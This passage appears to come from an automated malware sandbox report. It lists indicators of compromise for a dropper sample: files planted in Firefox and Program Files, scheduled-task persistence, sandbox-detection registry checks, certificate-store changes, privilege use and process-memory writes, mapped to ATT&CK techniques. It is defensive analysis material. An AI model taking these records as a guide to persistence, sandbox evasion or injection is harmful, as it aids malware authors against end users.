File created	C:\Program Files (x86)\tuyZfYaPCcjxC\EiTauGN.xml	xSZzGJO.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	QlBnrqw.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	QlBnrqw.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	QlBnrqw.exe
File created	C:\Program Files (x86)\XYcGyWaqnbhU2\aOHypIr.xml	QlBnrqw.exe
File created	C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\tNCRbMW.dll	QlBnrqw.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\beIeSqxTUIgkrqSZzo.job	schtasks.exe
File created	C:\Windows\Tasks\bIOEZkRAagKtMyjtNl.job	schtasks.exe
File created	C:\Windows\Tasks\explorti.job	KJKKJKEHDB.exe
File created	C:\Windows\Tasks\ayCOowYLgjutNKI.job	schtasks.exe
File created	C:\Windows\Tasks\JHXYugTugXnbcjp.job	schtasks.exe
File created	C:\Windows\Tasks\explorti.job	JDHIEBFHCA.exe
File created	C:\Windows\Tasks\LOHPKuWKJcOzSYPZu.job	schtasks.exe
File created	C:\Windows\Tasks\fxxmGIjnSbKlnnNZc.job	schtasks.exe
File created	C:\Windows\Tasks\ZNzITvxeQRflwsDJD.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3576	sc.exe
1680	sc.exe
3272	sc.exe
2260	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
5352	5672	WerFault.exe	206
4204	3824	WerFault.exe	204
452	1060	WerFault.exe	126
5336	372	WerFault.exe	282
5492	4088	WerFault.exe	127
5460	5172	WerFault.exe	379

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 28 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	qeHytovv8jeMkSTeroPzDfGu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	qeHytovv8jeMkSTeroPzDfGu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
5608	timeout.exe
4172	timeout.exe
5300	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	xSZzGJO.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	QlBnrqw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1d5b4de3-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	QlBnrqw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings	taskmgr.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5776	schtasks.exe
3336	schtasks.exe
5796	schtasks.exe
6096	schtasks.exe
4620	schtasks.exe
5588	schtasks.exe
3124	schtasks.exe
5212	schtasks.exe
4204	schtasks.exe
5388	schtasks.exe
2772	schtasks.exe
2628	schtasks.exe
532	schtasks.exe
3976	schtasks.exe
6028	schtasks.exe
2248	schtasks.exe
2948	schtasks.exe
5512	schtasks.exe
5748	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4604	Setup.exe
4604	Setup.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
2748	NhcUArWVz9h91TfdrLuqi3dN.exe
2748	NhcUArWVz9h91TfdrLuqi3dN.exe
552	wxNBuIU21ycpmjWnNfmKrUQ6.exe
552	wxNBuIU21ycpmjWnNfmKrUQ6.exe
2748	NhcUArWVz9h91TfdrLuqi3dN.exe
2748	NhcUArWVz9h91TfdrLuqi3dN.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe
2204	DSxvm0Qozb19cuFXWz0Me_M2.exe
2204	DSxvm0Qozb19cuFXWz0Me_M2.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
2692	RegAsm.exe
2692	RegAsm.exe
3832	taskmgr.exe
1040	powershell.exe
1040	powershell.exe
1040	powershell.exe
2948	RegAsm.exe
2948	RegAsm.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3832	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3832	taskmgr.exe
Token: SeSystemProfilePrivilege	3832	taskmgr.exe
Token: SeCreateGlobalPrivilege	3832	taskmgr.exe
Token: SeDebugPrivilege	552	wxNBuIU21ycpmjWnNfmKrUQ6.exe
Token: SeDebugPrivilege	2748	NhcUArWVz9h91TfdrLuqi3dN.exe
Token: SeDebugPrivilege	2948	RegAsm.exe
Token: SeBackupPrivilege	2948	RegAsm.exe
Token: SeSecurityPrivilege	2948	RegAsm.exe
Token: SeSecurityPrivilege	2948	RegAsm.exe
Token: SeSecurityPrivilege	2948	RegAsm.exe
Token: SeSecurityPrivilege	2948	RegAsm.exe
Token: SeDebugPrivilege	2692	RegAsm.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeIncreaseQuotaPrivilege	4204	WMIC.exe
Token: SeSecurityPrivilege	4204	WMIC.exe
Token: SeTakeOwnershipPrivilege	4204	WMIC.exe
Token: SeLoadDriverPrivilege	4204	WMIC.exe
Token: SeSystemProfilePrivilege	4204	WMIC.exe
Token: SeSystemtimePrivilege	4204	WMIC.exe
Token: SeProfSingleProcessPrivilege	4204	WMIC.exe
Token: SeIncBasePriorityPrivilege	4204	WMIC.exe
Token: SeCreatePagefilePrivilege	4204	WMIC.exe
Token: SeBackupPrivilege	4204	WMIC.exe
Token: SeRestorePrivilege	4204	WMIC.exe
Token: SeShutdownPrivilege	4204	WMIC.exe
Token: SeDebugPrivilege	4204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4204	WMIC.exe
Token: SeRemoteShutdownPrivilege	4204	WMIC.exe
Token: SeUndockPrivilege	4204	WMIC.exe
Token: SeManageVolumePrivilege	4204	WMIC.exe
Token: 33	4204	WMIC.exe
Token: 34	4204	WMIC.exe
Token: 35	4204	WMIC.exe
Token: 36	4204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4204	WMIC.exe
Token: SeSecurityPrivilege	4204	WMIC.exe
Token: SeTakeOwnershipPrivilege	4204	WMIC.exe
Token: SeLoadDriverPrivilege	4204	WMIC.exe
Token: SeSystemProfilePrivilege	4204	WMIC.exe
Token: SeSystemtimePrivilege	4204	WMIC.exe
Token: SeProfSingleProcessPrivilege	4204	WMIC.exe
Token: SeIncBasePriorityPrivilege	4204	WMIC.exe
Token: SeCreatePagefilePrivilege	4204	WMIC.exe
Token: SeBackupPrivilege	4204	WMIC.exe
Token: SeRestorePrivilege	4204	WMIC.exe
Token: SeShutdownPrivilege	4204	WMIC.exe
Token: SeDebugPrivilege	4204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4204	WMIC.exe
Token: SeRemoteShutdownPrivilege	4204	WMIC.exe
Token: SeUndockPrivilege	4204	WMIC.exe
Token: SeManageVolumePrivilege	4204	WMIC.exe
Token: 33	4204	WMIC.exe
Token: 34	4204	WMIC.exe
Token: 35	4204	WMIC.exe
Token: 36	4204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4600	WMIC.exe
Token: SeSecurityPrivilege	4600	WMIC.exe
Token: SeTakeOwnershipPrivilege	4600	WMIC.exe
Token: SeLoadDriverPrivilege	4600	WMIC.exe
Token: SeSystemProfilePrivilege	4600	WMIC.exe
Token: SeSystemtimePrivilege	4600	WMIC.exe
Token: SeProfSingleProcessPrivilege	4600	WMIC.exe
Token: SeIncBasePriorityPrivilege	4600	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
2980	wViHNmY1iKyifosq0zeVytNC.tmp
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe
3832	taskmgr.exe

Suspicious use of SetWindowsHookEx 33 IoCs

pid	Process
4604	Setup.exe
4440	nPAPquOt6RNvYOK4CQLeUD7_.exe
2200	5uGv7oVshZ8yAWH01j33e301.exe
4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe
4376	so48OhzPv9BhRSeWdcEKIXOJ.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe
664	5cTehe6gNdKe1Sv9i06NPlhi.exe
2468	wViHNmY1iKyifosq0zeVytNC.exe
2856	qeHytovv8jeMkSTeroPzDfGu.exe
2980	wViHNmY1iKyifosq0zeVytNC.tmp
2692	RegAsm.exe
720	Install.exe
4248	Install.exe
2904	MSBuild.exe
808	MSBuild.exe
2948	RegAsm.exe
1060	Install.exe
4088	Install.exe
4600	goldenmusicalvariety32_64.exe
4816	goldenmusicalvariety32_64.exe
732	BitLockerToGo.exe
1716	4750f66173.exe
1716	4750f66173.exe
3140	116eae0798.exe
2872	BKJJEBKKEH.exe
4256	RegAsm.exe
2420	CBAKJEHDBG.exe
3628	firefox.exe
3932	RegAsm.exe
4976	03613e22b6.exe
4976	03613e22b6.exe
808	8f3c6cbb8c.exe
5716	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4604 wrote to memory of 4440	4604	Setup.exe	104
PID 4604 wrote to memory of 4440	4604	Setup.exe	104
PID 4604 wrote to memory of 4440	4604	Setup.exe	104
PID 4604 wrote to memory of 2748	4604	Setup.exe	107
PID 4604 wrote to memory of 2748	4604	Setup.exe	107
PID 4604 wrote to memory of 2748	4604	Setup.exe	107
PID 4604 wrote to memory of 664	4604	Setup.exe	106
PID 4604 wrote to memory of 664	4604	Setup.exe	106
PID 4604 wrote to memory of 664	4604	Setup.exe	106
PID 4604 wrote to memory of 2468	4604	Setup.exe	108
PID 4604 wrote to memory of 2468	4604	Setup.exe	108
PID 4604 wrote to memory of 2468	4604	Setup.exe	108
PID 4604 wrote to memory of 2856	4604	Setup.exe	109
PID 4604 wrote to memory of 2856	4604	Setup.exe	109
PID 4604 wrote to memory of 2856	4604	Setup.exe	109
PID 4604 wrote to memory of 2204	4604	Setup.exe	105
PID 4604 wrote to memory of 2204	4604	Setup.exe	105
PID 4604 wrote to memory of 2200	4604	Setup.exe	110
PID 4604 wrote to memory of 2200	4604	Setup.exe	110
PID 4604 wrote to memory of 2200	4604	Setup.exe	110
PID 4604 wrote to memory of 552	4604	Setup.exe	111
PID 4604 wrote to memory of 552	4604	Setup.exe	111
PID 4604 wrote to memory of 552	4604	Setup.exe	111
PID 4604 wrote to memory of 4376	4604	Setup.exe	112
PID 4604 wrote to memory of 4376	4604	Setup.exe	112
PID 4604 wrote to memory of 4376	4604	Setup.exe	112
PID 4604 wrote to memory of 4176	4604	Setup.exe	114
PID 4604 wrote to memory of 4176	4604	Setup.exe	114
PID 4604 wrote to memory of 4176	4604	Setup.exe	114
PID 4604 wrote to memory of 3616	4604	Setup.exe	113
PID 4604 wrote to memory of 3616	4604	Setup.exe	113
PID 2468 wrote to memory of 2980	2468	wViHNmY1iKyifosq0zeVytNC.exe	115
PID 2468 wrote to memory of 2980	2468	wViHNmY1iKyifosq0zeVytNC.exe	115
PID 2468 wrote to memory of 2980	2468	wViHNmY1iKyifosq0zeVytNC.exe	115
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 4440 wrote to memory of 2692	4440	nPAPquOt6RNvYOK4CQLeUD7_.exe	116
PID 2200 wrote to memory of 720	2200	5uGv7oVshZ8yAWH01j33e301.exe	117
PID 2200 wrote to memory of 720	2200	5uGv7oVshZ8yAWH01j33e301.exe	117
PID 2200 wrote to memory of 720	2200	5uGv7oVshZ8yAWH01j33e301.exe	117
PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 664 wrote to memory of 4248	664	5cTehe6gNdKe1Sv9i06NPlhi.exe	118
PID 664 wrote to memory of 4248	664	5cTehe6gNdKe1Sv9i06NPlhi.exe	118
PID 664 wrote to memory of 4248	664	5cTehe6gNdKe1Sv9i06NPlhi.exe	118
PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
PID 4176 wrote to memory of 2948	4176	CIRkadtqPM_Xa4VYR1LxfMY4.exe	119
